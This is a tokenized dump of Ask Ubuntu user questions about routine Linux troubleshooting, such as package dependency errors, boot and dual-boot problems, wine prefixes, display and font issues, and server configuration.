translation-en_us ign http : //toolbelt.heroku.com ./ translation-en hit http : //repository.spotify.com stable/non-free amd64 packages hit http : //repository.spotify.com stable/non-free i386 packages ign http : //repository.spotify.com stable/non-free translation-en_us ign http : //repository.spotify.com stable/non-free translation-en ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //extras.ubuntu.com trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en ign http : //extras.ubuntu.com trusty/main translation-en hit http : //repos.codelite.org saucy/universe amd64 packages hit http : //repos.codelite.org saucy/universe i386 packages ign http : //repos.codelite.org saucy/universe translation-en_us ign http : //repo.steampowered.com precise/steam translation-en_us ign http : //repos.codelite.org saucy/universe translation-en ign http : //repo.steampowered.com precise/steam translation-en 100 % [ connecting to archive.ubuntu.com ( 2001:67c:1360:8c01 : :19 ) ] [ connecting to dl.google.com ( 2607 : f8b0:4002:802 : :1005 ) ] ` at this point it stops doing anything . i tried massing with my ppa settings , as well as my download-from location , but nothing seemed to change . here 's what shows up when i run ifconfig : ifconfig eth0 link encap : ethernet hwaddr 10 : bf:48:6e : db:61 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:33721 errors:0 dropped:0 overruns:0 frame:0 tx packets:33721 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4158224 ( 4.1 mb ) tx bytes:4158224 ( 4.1 mb ) wlan0 link encap : ethernet hwaddr e0:06 : e6:2a:3a : bb inet addr:192.168.2.23 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : 2601:0 : b680:1d8 : f240 : a5c6 : a9af:2df/128 scope : global inet6 addr : fe80 : :e206 : e6ff : fe2a:3abb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5214256 errors:0 dropped:1 overruns:0 frame:0 tx packets:2724566 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7298102756 ( 7.2 gb ) tx bytes:274205022 ( 274.2 mb )
514911	why 'nobody ' always starts a new `find` program that always consume my memory ?	$ ps -elf | grep ... 0 d nobody 27320 27319 2 90 10 - 353471 sleep_ 07:54 ? 00:02:19 /usr/bin/find / -ignore_readdir_race ( -fstype nfs -o -fstype nfs -o -fstype nfs4 -o -fstype afs -o -fstype binfmt_misc -o -fstype proc -o -fstype smbfs -o -fstype autofs -o -fstype iso9660 -o -fstype ncpfs -o -fstype coda -o -fstype devpts -o -fstype ftpfs -o -fstype devfs -o -fstype mfs -o -fstype shfs -o -fstype sysfs -o -fstype cifs -o -fstype lustre_lite -o -fstype tmpfs -o -fstype usbfs -o -fstype udf -o -fstype ocfs2 -o -type d -regex \ ( ^/tmp $ \ ) \|\ ( ^/usr/tmp $ \ ) \|\ ( ^/var/tmp $ \ ) \|\ ( ^/afs $ \ ) \|\ ( ^/amd $ \ ) \|\ ( ^/alex $ \ ) \|\ ( ^/var/spool $ \ ) \|\ ( ^/sfs $ \ ) \|\ ( ^/media $ \ ) \|\ ( ^/var/lib/schroot/mount $ \ ) ) -prune -o -print0 ... this job always start automatically and consumes my memory . even after i kill it , it will starts several hours later . what 's that job ? edit note : the pid is different from the above because i killed the above one , wait for several hours , then the second one comes . $ pstree -psl |-anacron ( 25920 ) -- -sh ( 25929 ) -- -run-parts ( 25930 ) -- -locate ( 26343 ) -- -updatedb.findut ( 26348 ) -+-frcode ( 26358 ) | |-sort ( 26357 ) | `-updatedb.findut ( 26356 ) -- -su ( 26387 ) -- -sh ( 26402 ) -- -find ( 26403 ) this is what it look like in a graphical tool :
514913	how to get a larger root partition on touch	i 'm trying to make touch ( 14.10 ) work as an ubuntu server . however the root partition is only 2 gb and is insufficient for the packages i need to install . is there any way to get more space on the root partition ? thus far i 've tried : resize2fs on /dev/loop0 wo n't work since the kernel does n't support online resizing and i ca n't unmount root ( ro does n't cut it , even with -f ) . adding 2 gb to the end of /userdata/ubuntu.img works , but resize2fs on the file does n't help .
514915	how much time to wait to upgrade to a non lts release ?	for lts upgrades the recomendation is wait 3 months or first point release to is where the major bugs are fixed and the release is `` stable '' for production . what is the recommended amount of time to wait before upgrade to a non lts release ? im just talking about the desktop version of course . im asking because found this where say all release from 14.04 will be based on debian unstable : cutting edge : starting with the 14.04 lts development cycle , automatic full package import is performed from debian unstable1 this is due to deploying proposedmigration in the ubuntu archive . from here .
514917	windows 8.1 ubuntu will not run after restart	i have been searching the internet forever now , but i am using wubi on a windows 8.1 laptop . i have properly burned the newest version of ubuntu , i have never done this before , so please put the answer in simple terms . when i open wubi it comes up with these options : reboot now manually reboot later i put `` reboot now '' , and it reboots with no changes or differences to my operating system . the installer does not pop up upon rebooting and i have no idea what to try . i am a totally newbie at this . please help me . i am using an asus computer .
514918	shutdown , restart , halt issues , not powering off system	before any one says search around , i have , to no avail . i ca n't seem to get it working after trying every fix out there . so basically , when i turn off my laptop it shuts down fine but the last line is `` system will now halt '' but power never gets cut , i 've tried shutdown -p and shutdown -h same result . then when i try restart it goes through the same process but hangs on `` system will now restart '' but i ca n't figure it out , i am running full ubuntu with no other operating systems . any tips ?
514919	ca n't remove the libpcap0.8 package	i am getting error when running apt-get remove root @ system : ~/downloads # sudo apt-get remove the following packages have unmet dependencies : libpcap0.8 : breaks : libpcap0.8 : i386 ( ! = 1.4.0-2 ) but 1.5.3-2 is installed libpcap0.8 : i386 : breaks : libpcap0.8 ( ! = 1.5.3-2 ) but 1.4.0-2 is installed libpcap0.8-dev : depends : libpcap0.8 ( = 1.5.3-2 ) but 1.4.0-2 is installed e : unmet dependencies . try using -f. and when i ran apt-get remove -f this is what happens : root @ system : ~/downloads # sudo apt-get remove -f the following extra packages will be installed : libpcap0.8 the following packages will be upgraded : libpcap0.8 1 upgraded , 0 newly installed , 0 to remove and 365 not upgraded . 2 not fully installed or removed . need to get 0 b/110 kb of archives . after this operation , 13.3 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 163539 files and directories currently installed . ) preparing to unpack ... /libpcap0.8_1.5.3-2_amd64.deb ... unpacking libpcap0.8 : amd64 ( 1.5.3-2 ) over ( 1.4.0-2 ) ... dpkg : error processing archive /var/cache/apt/archives/libpcap0.8_1.5.3-2_amd64.deb ( -- unpack ) : trying to overwrite shared '/usr/share/man/man7/pcap-filter.7.gz ' , which is different from other instances of package libpcap0.8 : amd64 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/libpcap0.8_1.5.3-2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ system : ~/downloads # clear root @ system : ~/downloads # sudo apt-get remove -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libpcap0.8 the following packages will be upgraded : libpcap0.8 1 upgraded , 0 newly installed , 0 to remove and 365 not upgraded . 2 not fully installed or removed . need to get 0 b/110 kb of archives . after this operation , 13.3 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 163539 files and directories currently installed . ) preparing to unpack ... /libpcap0.8_1.5.3-2_amd64.deb ... unpacking libpcap0.8 : amd64 ( 1.5.3-2 ) over ( 1.4.0-2 ) ... dpkg : error processing archive /var/cache/apt/archives/libpcap0.8_1.5.3-2_amd64.deb ( -- unpack ) : trying to overwrite shared '/usr/share/man/man7/pcap-filter.7.gz ' , which is different from other instances of package libpcap0.8 : amd64 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/libpcap0.8_1.5.3-2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ system : ~/downloads # root @ system : ~/downloads # sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libpcap0.8 : breaks : libpcap0.8 : i386 ( ! = 1.4.0-2 ) but 1.5.3-2 is installed libpcap0.8 : i386 : breaks : libpcap0.8 ( ! = 1.5.3-2 ) but 1.4.0-2 is installed libpcap0.8-dev : depends : libpcap0.8 ( = 1.5.3-2 ) but 1.4.0-2 is installed e : unmet dependencies . try using -f. root @ system : ~/downloads # apt-cache policy libpcap0.8 : amd64 libpcap0.8 libpcap0.8-dev libpcap0.8 : installed : 1.4.0-2 candidate : 1.5.3-2 version table : 1.5.3-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages *** 1.4.0-2 0 100 /var/lib/dpkg/status libpcap0.8 : installed : 1.4.0-2 candidate : 1.5.3-2 version table : 1.5.3-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages *** 1.4.0-2 0 100 /var/lib/dpkg/status libpcap0.8-dev : installed : 1.5.3-2 candidate : 1.5.3-2 version table : *** 1.5.3-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status root @ system : ~/downloads # root @ system : ~/downloads # sudo apt-get -f remove libpcap0.8 libpcap0.8-dev libpcap0.8-dev : i386 libpcap0.8 : i386 reading package lists ... done building dependency tree reading state information ... done package 'libpcap0.8-dev : i386 ' is not installed , so not removed . did you mean 'libpcap0.8-dev ' ? you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libpcap-dev : depends : libpcap0.8-dev but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ system : ~/downloads # sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libpcap0.8 the following packages will be upgraded : libpcap0.8 1 upgraded , 0 newly installed , 0 to remove and 365 not upgraded . 2 not fully installed or removed . need to get 0 b/110 kb of archives . after this operation , 13.3 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 163539 files and directories currently installed . ) preparing to unpack ... /libpcap0.8_1.5.3-2_amd64.deb ... unpacking libpcap0.8 : amd64 ( 1.5.3-2 ) over ( 1.4.0-2 ) ... dpkg : error processing archive /var/cache/apt/archives/libpcap0.8_1.5.3-2_amd64.deb ( -- unpack ) : trying to overwrite shared '/usr/share/man/man7/pcap-filter.7.gz ' , which is different from other instances of package libpcap0.8 : amd64 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/libpcap0.8_1.5.3-2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ system : ~/downloads #
514920	downgrade from dev to stable ( glibc_2.19 to glibc_2.17 )	just wondering if i could get some help here , at the minute my vps has glibc_2.19 and i donot want that . i need glibc_2.17 . i believe glibc_2.19 is a dev package . i am a newby to linux so take it easy on me : ) thanks
514921	very slow write access to ssd disks on some asus p8z77 motherboards	i have asus p8z77-v lk motherboard , that ran mint 13 ( based on ubuntu 12.04 ) just perfectly , but recently i 've tried to install mint 17 and noticed abysmal write performance . write speed on ssd disk was about 1.5mb/sec , when it 's supposed to be in 150-250mb/sec range . for write testing i 've used dd if=/dev/zero of=/dev/sda bs=10m count=10 while booted up from livecd . i have also tested the read speed with hdparm -tt /dev/sda and got about 440mb/sec -- that 's normal . i can tell , the read performance has not degraded at all and is not an issue here . since i had a few different ssd disks and few motherboards , i 've tested and tested and here are results : asus p8h77 works fine with mint13 , has very slow write speed starting from mint14 . asus p8z77-v lk works with mint13 , has very slow write speed starting from mint14 . asus p8z77-v pro works with mint13 , and works just fine with mint14 , 15 , 16 and 17 . the only difference between `` pro '' version and others is that it has extra sata controller onboard ( in addition to the z77 chipset sata controller ) providing extra 2 sata ports . ssd disks work fine with `` pro '' version when connected to the native sata ports as well as to the ports provided by extra sata controller , so this does not look like a hardware issue . as far as i can tell , there 's something changed in the kernel while going from 3.2 to 3.5 , that affects the detection of onboard sata controller for asus p8*77 motherboards , that screws up the write speed for ssd drives . could anyone shed some light on how to fix this issue or , possibly , give a pointer to a more suitable place to ask this question ?
514922	what is the keyboard shortcut to switch between the 4 workspace	i 'm relearning linux and i totally forgot how to do this . please help .
514923	ca n't select continue to install ubuntu alongside them	i 'm trying to install ubuntu 14.04 alongside window 7 on my pc . i got to the installation type page and it detected my windows 7 , then asked me what i would like to do . i selected the option to install ubuntu alongside them ; however , the continue button was then grayed out . if instead i chose the option to do something else , the continue button was still grayed out . i was given absolutely no explanation for why it was grayed out . the only option that would let me continue was to erase the disk , which i do not want to do . i have two hard disks , and one of them has two partitions on it . the second partition is completely unused , and has a terabyte of space . that 's where i wanted to install it . can somebody please tell me why i ca n't install ubuntu alongside windows 7 here ?
514927	killed ibm t42 trying to boot from usb	downloaded ubuntu desktop iso , ( http : //www.ubuntu.com/download/desktop/thank-you ? country=us & version=14.04.1 & architecture=i386 ) , to my desktop & installed to a 4g sd card using a usb2 card reader & a 2g usb2 stick using lili , i attempted to boot my t42 , ( xppro sp3 ) into ubuntu from card w\f12 option , after selecting card as boot device , reader began flashing , indicating it was being read . after approximatly 30 sec laptop shut down & will not reboot to anything , screen is black & no hard drive activity . have tryied multiple reboots , to windows , to ubuntu , ( card & stick ) , & xppro install cd . nothing has worked , sure hoping someone here can help ! rickh
514928	installing ubuntu 14 server x64 on intel array 1 system	i have a server with intel i7 technology . it comes with 2 hdd ( 2tby each ) and i configured ( using bios ) as raid1 ( mirroring ) when i started ubuntu server installation , it recognizes the array , asked me to activate and use related features and installed it without any problems . at the end install grub on mbr . on first reboot , it did not start from raid and tried to boot ( again ) from hdd . how can i let ubuntu know that it must boot from raid ? regards ariel
514930	unity 14.04 desktop does not take focus for `` focus under mouse ''	i am using an updated 14.04 ubuntu with unity ( regular setup , nothing fancy or custom ) . i have `` focus under mouse '' enabled . this works fine , except that the desktop can not get the focus - this is a severe issue as the following shows : situation : one window open ( e.g . file browser ) with the home folder selected ( mouse is on this window , it has the focus , all ok ) . then , i click on an icon on the desktop screen ( i.e . outside the browser window ) . the icon gets selected and seems to have the focus . then , i hit the [ delete ] button on the keyboard . guess what , not the selected icon on the desktop gets deleted but the entire home folder which is selected in the browser window and should not have the focus . can someone point me to a solution how to get a clean `` focus under mouse '' behavior ? ps : no worries , i did n't delete the home folder , just a single file when i noted this bad behaviour -- and i could undo the deletion because it just went to the trash .
514931	wine 1.6.2-trying to switch to 32-bit wineprefix from 64-bit wine ( trusty 14.04 ) . can anyone help me out ?	hello fellow ubuntu users , i 'm having a little trouble with wine 1.6.1 and i was wondering if someone could help me out . i recently downloaded some 32-bit games that i 'd wanted to try ( beamng drive and bugbear 's next car game demo ) and i had run into some trouble trying to get either of these games to run . so i came across a couple pieces of advice on the 'net , one here on the ubuntu community site and the other at beamng 's forums , on how to create a 32-bit wineprefix on a 64-bit setup . i managed to be able to create the wine32 folder , but now i 'm having trouble making it my default wine setup . anybody have any idea how i can do that ? i 'll post the urls for said advice , btw : http : //www.beamng.com/threads/1788-installing-drive-under-linux-via-wine how do i create a 32-bit wine prefix ? here 's what i 've tried so far in the terminal : steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix='/home/user/wine32 ' winearch='win32 ' wine 'wineboot' wine : chdir to /home/user/wine32 : no such file or directory steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix='/home/steven/wine32 ' winearch='win32 ' wine 'wineboot' wine : created the configuration directory '/home/steven/wine32' fixme : storage : create_storagefile storage share mode not implemented . err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot fixme : storage : create_storagefile storage share mode not implemented . fixme : iphlpapi : notifyaddrchange ( handle 0x10ee890 , overlapped 0x10ee89c ) : stub wine : configuration in '/home/steven/wine32 ' has been updated . steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix= $ home/.wine32 wine dxsetup.exe wine : created the configuration directory '/home/steven/.wine32' fixme : storage : create_storagefile storage share mode not implemented . err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot fixme : storage : create_storagefile storage share mode not implemented . fixme : iphlpapi : notifyaddrchange ( handle 0x103e2b8 , overlapped 0x103e2d0 ) : stub fixme : storage : create_storagefile storage share mode not implemented . fixme : iphlpapi : notifyaddrchange ( handle 0x10fe890 , overlapped 0x10fe89c ) : stub wine : configuration in '/home/steven/.wine32 ' has been updated . wine : can not find l '' c : \windows\system32\dxsetup.exe '' steven @ steven-hp-pavilion-17-notebook-pc : ~ $ winearch=win64 winecfgsteven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix='/home/steven/wine32 ' winearch='win32 ' wine 'wineboot' steven @ steven-hp-pavilion-17-notebook-pc : ~ $ winearch=win32 winecfg wine : winearch set to win32 but '/home/steven/.wine ' is a 64-bit installation . steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix='/home/steven/wine32 ' winearch='win32 ' wine 'wineboot' steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix='/home/user/wine32 ' winearch='win32 ' wine 'wineboot' wine : chdir to /home/user/wine32 : no such file or directory steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix='/home/steven/wine32 ' winearch='win32 ' wine 'wineboot' steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix=/home/steven/wine32 winearch='win32 ' wine 'wineboot' steven @ steven-hp-pavilion-17-notebook-pc : ~ $ wineprefix=/home/steven/wine32 winearch=win32 wine wineboot steven @ steven-hp-pavilion-17-notebook-pc : ~ $ so , yeah . tbh , though , i 'm far from an expert and perhaps i 've been going about it all the wrong way . in the meantime , i 'll try to keep looking for solutions on my own , but if anybody can help me solve this dilemma , especially if anyone happens to own any of these two games in particular , i 'd appreciate it . : )
514933	install ubuntu on ssd and keep personal files on ntfs drive	i currently have windows 7 installed on an ssd and just got another ssd which i want to install ubuntu on . my current setup with windows 7 is that i have all of my games and apps installed on the ssd , but i have all of the personal folders like `` my music , '' `` my videos , '' `` desktop '' and others point to a regular hdd . that way whatever files i have on my desktop are actually stored on the regular hdd , and not the ssd . these files are ordinary files that any os can open , such as pictures , videos , etc . my question is whether i can get ubuntu to use that same drive for the /home directory so that all of my personal files are stored on there as well , but without reformatting it . i would like to be able to still use it with the current setup that i have on windows 7 , but i would like ubuntu to use it as well . is there a way for me to do this ? the hdd is formatted as ntfs . please let me know if i was n't clear or if more detail is needed . thanks
514936	how to upgrade libstdc++ to work with glibc_2.19	i 'm using glibc 2.19 but my libstdc++ is n't working with it , how do i get a version that does ?
514937	bashrc script not accepting space in directory name	i have added a variable at the end of my ~/.basrc file : export xyz = /home/faizal/dev/adt workspace/xyz but if i open a new terminal , i get the error : bash : export : 'workspace/xyz ' : not a valid identifier so i try a variety of alternatives : export xyz=/home/faizal/dev/adt\ workspace/xyz export xyz= '' /home/faizal/dev/adt workspace/xyz '' export xyz= '' /home/faizal/dev/adt\ workspace/xyz '' export xyz='/home/faizal/dev/adt workspace/xyz' export xyz='/home/faizal/dev/adt\ workspace/xyz' they all give me the error when i try cd $ xyz : bash : cd : /home/faizal/dev/adt : no such file or directory what am i doing wrong ?
514941	screen going black , further investigation reveals healthy ram and hard disk , and several kernel oops logs	six days ago , i went to go take a shower , and i suspended ubuntu as usual , to save battery life . i came back , and the screen was black . reisub and general fiddling around did nothing . restarted , and still had nothing on the screen . since then , this has happened several times , and the only fix is to force shut laptop , take out battery , hold power button , put battery back in , boot . i have investigated further into the matter , doing a ram test and a hard disk check . both turned out fine . then my attention turned towards the error messages i was receiving upon bootup , the whole system program problem detected deal . i did some digging and found four kernel oops logs in my /var/crash . what i can understand of them points to two things : they are connected to my suspending problems , since there are four them ( i have had four suspending crashes ) , and they both confirm that there was a issue with waking up from suspend , and the crashes might have to do with python ( possibly could be jumping to conclusions ) , since mentions of python are peppered throughout the logs . at this point , i am unsure of how to continue , and i have come here for help . is there any way i can fix this ? should i start by uploading the logs here ? edit : i uploaded the crash reports to google drive , because all of them were too big for pastebin or paste.ubuntu.com . i know putting them in a zip file might have messed up the files somewhat , but the files by themselves were not uploading for some reason . https : //drive.google.com/folderview ? id=0bw62ls9pztq2swc2z2posy05qlk & usp=sharing
514943	how to permanent remove rhythmbox , vlc etc under sound	while using dconf . it temporarily removes but always reappear or reset and these media player sit just under sound menu . ubuntu sound menu option looks like dogs tail . never gon na be straight . i have tried several alternative method but all of them just temporary . vlc , rhythmbox comes again under sound icon on ubuntu 14.04 what to do ? how to remove them permanently all media player under sound icon but not from system . i have tried several method but all are temporary solution , please give permanent solution .
514945	trying to clean install windows 8 after ubuntu has been successfully installed onto my system	hello to all ubuntu users . i am posting this message as my last resort to try and solve some issues i am having with my system . here is some technical info : my laptop is lenovo g500s notebook , 8gb ram , 64bit , 1tb hard drive , intel i5 , windows 8 was pre-installed with uefi i successfully installed ubuntu desktop 14.04 with uefi enabled over my windows 8 os with no issues . after using ubuntu for a while i decided that i would like to stick to windows because ubuntu os is to advanced for me . i like the simplicity of just double clicking an executable file to install a program rather than entering commands in the terminal or searching for an open source alternative . so i am having trouble trying to remove ubuntu and do a clean install of windows 8 on my system . here is what i am doing to try and clean install windows 8 . i have a windows 8.iso disk that has been tested and confirmed working using another notebook . i try to boot from the disk to start up the windows 8 installer but its not working , more specifically , i do not have the option to boot from the dvd . i also tried another windows 7 iso image disk i had with no luck . i am thinking it has to do with my bios , because when i try to edit the boot sequence there is no option for my disk drive . here are some images of the boot tab in bios i took using my phone . [ img ] http : //i60.tinypic.com/whck1f.jpg [ /img ] [ img ] http : //i61.tinypic.com/10qymih.jpg [ /img ] what i did notice is that insydeh2o setup utility was not my bios . i originally had the stock lenovo system bios , i think that after installing ubuntu onto my system somehow it changed my bios . however , when i insert the ubuntu installation/live cd disk i magically have the option to boot from the dvd drive . so i am hoping someone out there has a solution to my problem , or knows how to remove ubuntu to allow me to do a clean install of windows 8 . i was thinking maybe if i wipe the hard drive or format it to allow me to clean install windows 8 with uefi enabled , if possible . any suggestion/help is greatly appreciated .
514954	how to boot from toshiba recovery partition after installing ubuntu 14.04.1 ?	im new here and have not found a post even close to this so here it is : i installed ubuntu 14.04.1 over my windows 7 home premium installation . did n't loose any important data.skip to when the install is done i tried out ubuntu and got sick of it after a while . ( the try ubuntu option was greyed out ) i got sick of ubuntu after about an hour and i tried to boot into my recovery partition . that 's where im running into trouble : you are supposed to hold down the numerical `` 0 '' while turning on the power . but it just proceeds to load grub/ubuntu and does not even try to boot into the recovery partition . `` 000000000000 '' is all i get from holding it down i know the recovery partition is intact , but i cant access it , even when setting a boot flag on it . i am stumped and i really need answers thanks in advance ! specs toshiba satellite l775 intel core i3 dual core processor original os : windows 7 home premium 64 bit sp1 let me know if you need more info !
514955	do logins by the gdm ( or lightdm ) user in auth.log mean my system is breached ?	please look at this auth.log ( from ubuntu 14.04 ) i have provided and tell me who this gdm user is and why there are all these unauthenticated logins ? i am freaked out ; please help ! here 's the /var/log/auth.log file : http : //paste.ubuntu.com/8120231/ update : i know now that `` gdm '' is gnome desktop manager and it 's there because of root . but please look at the log there is more and tell me if my system is breached .
514956	how do disable the cd-rom for all users ?	i want to disable cdrom/cdrw/dvdrom/dvdrw for everyone in ubuntu 14.04.1 desktop 64-bit edition . i have tried following but not worked : removed user from /etc/group , as following : cdrom : x:24 : as defined at permanently disable cd drive defined rules in /etc/udev/rules.d/71-cdrom-block.rules and /lib/udev/rules.d/71-cdrom-block.rules as follows : env { udisks_system } = '' 1 '' , env { udisks_auto } = '' 0 '' , env { udisks_system_internal } = '' 1 '' , env { udisks_automount_hint } = '' never '' as defined at http : //superuser.com/questions/693155/disable-device-node-using-udev-dev-sr0 but still i am able mount the cd-rom . kindly help how to disable it for everyone .
514958	is there a better way to programatically get the networking parameters from linux os ?	i am writing some scripts which need to programatically get a lot of networking parameters from linux os . for example , the names of all network interfaces , ip address , netmask , mac address . for wireless interface , i may also need to get the bit rate , frequency , operating mode , transmit power , signal level , noise level , etc . currently , i am using normal text progressing and regular expression to parse the output of linux command line tools like ifconfig , ip , route , iw and iwconfig . one of the problems of this method is that sometimes the output will be different from what we have expected . it is difficult to predict all possible output format for all possible scenarios . is there a better way to programatically get the networking parameters from linux os ?
514960	unable to boot 12.04 after recent software installation	rephrased my question after eliah kagan 's suggestion . i dont mind going back to 12.04 and trying to fix my problem . my first real serious ubuntu problem . when i invoked the command make install for installing zlib libraries ubuntu 12.04 froze . at that time i tried to repeatedly press control-alt -delete but it does not bring up a proper boot sequence . it gives the message - stopping cups printing spooler/server . how to recover the system from this point ?
514963	is there any gui application for command rsync ?	i am currently synchronize between local folders in my computer by following command : rsync -av -- delete `` [ source ] '' `` [ destination ] '' now i want to do this via gui . so , is there any gui available for ubuntu which works similar as by command rsync ? and how can i install it ?
514966	external hard drive	i have an internal hard drive that was a dual boot of windows and ubuntu 12.04 and i would like to use it as an external hard drive , but if i mount it using ubuntu machine i can see different folders but ca n't find any of my documents , if using windows i can not actually see it open . any idea how to overcome that or at least , how to format it so i can use it as external hd .
514971	all fonts look weird in emails and on websites , how can i fix this ?	i 've just installed ubuntu and my fonts look weird on website and in emails . below are some screenshots of thunderbird and chromium . the problem occurs in the following programs : chromium firefox thunderbird how can i fix it ? in thunderbird : in chromium :
514972	mozilla firefox hangs in ubuntu 14.04	i have recently upgraded my system from ubuntu 12.04 lts to ubuntu 14.04 lts . in the beginning everything was fine . it has been happening from 2-3 days that whenever i play any video on youtube , mozilla firefox hangs for 5 seconds , then responds for a second and then hangs once again so that i have to force close the browser . any solutions to this problem ? $ lscpu architecture : i686 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 4 on-line cpu ( s ) list : 0-3 thread ( s ) per core : 2 core ( s ) per socket : 2 socket ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 42 stepping : 7 cpu mhz : 2501.000 bogomips : 4989.08 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 256k l3 cache : 3072k
514973	untrusted application launcher ( symlink )	i have tried : untrusted application launcher and untrusted application launcher ? neither of above applies to this case , as i made a symbolic link : /usr/share/applications $ ls -la onboard.desktop -rwxr-xr-x 1 root root 326 apr 7 12:21 onboard.desktop ~/desktop $ ls -la lrwxrwxrwx 1 lj lj 39 jul 26 22:22 onboard.desktop - > /usr/share/applications/onboard.desktop unity claims owner is root , and as it may be noted x flag is on . finally this was working until last update ( yesterday ) 14.04lts/unity
514974	checkpoint ssl and ubuntu 14.04	i have the following issue . in our company we use checkpoint endpoint client . however i started using ubuntu 14.04 and since there is no client for it i need to log into the ssl portal . once i log in and press connect so to connect to the ssl vpn a new window appears saying that java is not installed . however , i have installed a few different javas , including oracle one v.8 . then i can browse intranet sites but i can not make rremote desktop to different server in the organization . checking with ifconfig shows an ip only from a 192.168.x.x network . as far as i know i need to have also another network adapter with address from 172.x.x.x something network . i 'm sorry if i have n't explained the best way , but i 'm new into linux systems , i 'd appreciate your help . thank you !
514976	ubuntu 14.04.1 installation problem	i tried installing ubuntu 14.04.1 on both v-box and as a dual boot but it hangs on black screen with only mouse pointer working and no further installation.is my iso corrupt or its a part of installation . also reply me with notes on dual booting linux if possible . pardon me if it seems to be a silly question actually this my first encounter with linux .
514979	modifying common keyboard shortcuts in ubuntu [ 14.04 ]	i need to modify the common applicaton shortcuts in ubuntu 14.04 so i can use the super ( windows ) key instead of ctrl . i looked them up in system settings > keyboard > shortcuts but there are no options to change them . how can i have the super key replace the ctrl in these shorcuts ?
514983	ubuntu sleeps and wakes repeatedly on critically low battery state	when the battery is critically low it just suspends itself and wakes again automatically repeatedly in a loop . and i need to be like very very fast to click the shutdown button to turn down the computer obviously . the loop seems unending till the battery dies completely . and i have noticed that battery drains so fast in ubuntu than in windows . is that a hardware problem or do i need to tweak something ? thank you guys in advance . ubuntu 14.04 64bit on hp probook .
514986	access server via a browser with dns	i have ubuntu 14.04 server running . when on my lan i can go to a browser to access services running like transmission and plex by using the dns address and the port number . my question is : how do i do this over the internet ? i have given the server a static ip address on the lan and router the ports for the services to the server . i do n't know what to type in to the browser to access the services and it 's driving me mad , can anyone help ?
514988	how to disable file indexing in lubuntu 14.04 ?	i use lubuntu on an old xp laptop , and it works like a charm . in xp i was able to turn off indexing of the hard disk and it would increase performance a bit and i found out how to do it ubuntu as well but this does not seem to apply for lubuntu . is there anyone who knows how i can disable file indexing of the hard drive ? thank you in advance !
514990	avconv : can convert from mp4 to mp3 but mp3 wo n't rewind on mp3 player . goes back to beginning instead	i 'm using the following to convert mp4 's to mp3 's . they convert with no errors and play well , ff but when i rw it goes straight back to the beginning . blockquote avconv -i mp4file.mp4 -b : a 128k -c : a libmp3lame mp # file.mp3 can anyone please tell me what i need to tdo to be able to convert these files for that the rewind function works on my mp3 player .
514992	ubuntu 14.04 upgrade	ubuntu 14.04 has destroyed my pc when i upgraded . i now have a no entry sign on the top right of my screen , i am receiving a no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory message . i can not access updates , ubuntu software centre , and my machine takes more than a minute to boot whereas it only took about 10 seconds before the upgrade . this may be related to samba .
514993	ldap with ssl server configuration in ubuntu 12.04 server	i have successfully installed ldap server on ubuntu 12.04 and other ubuntu client can authenticate successfully but i want to secure ldap client server communication with the help of ssl i searched the web but was unable to find a suitable tutorial or howto any help will be appreciated regarding thanks ,
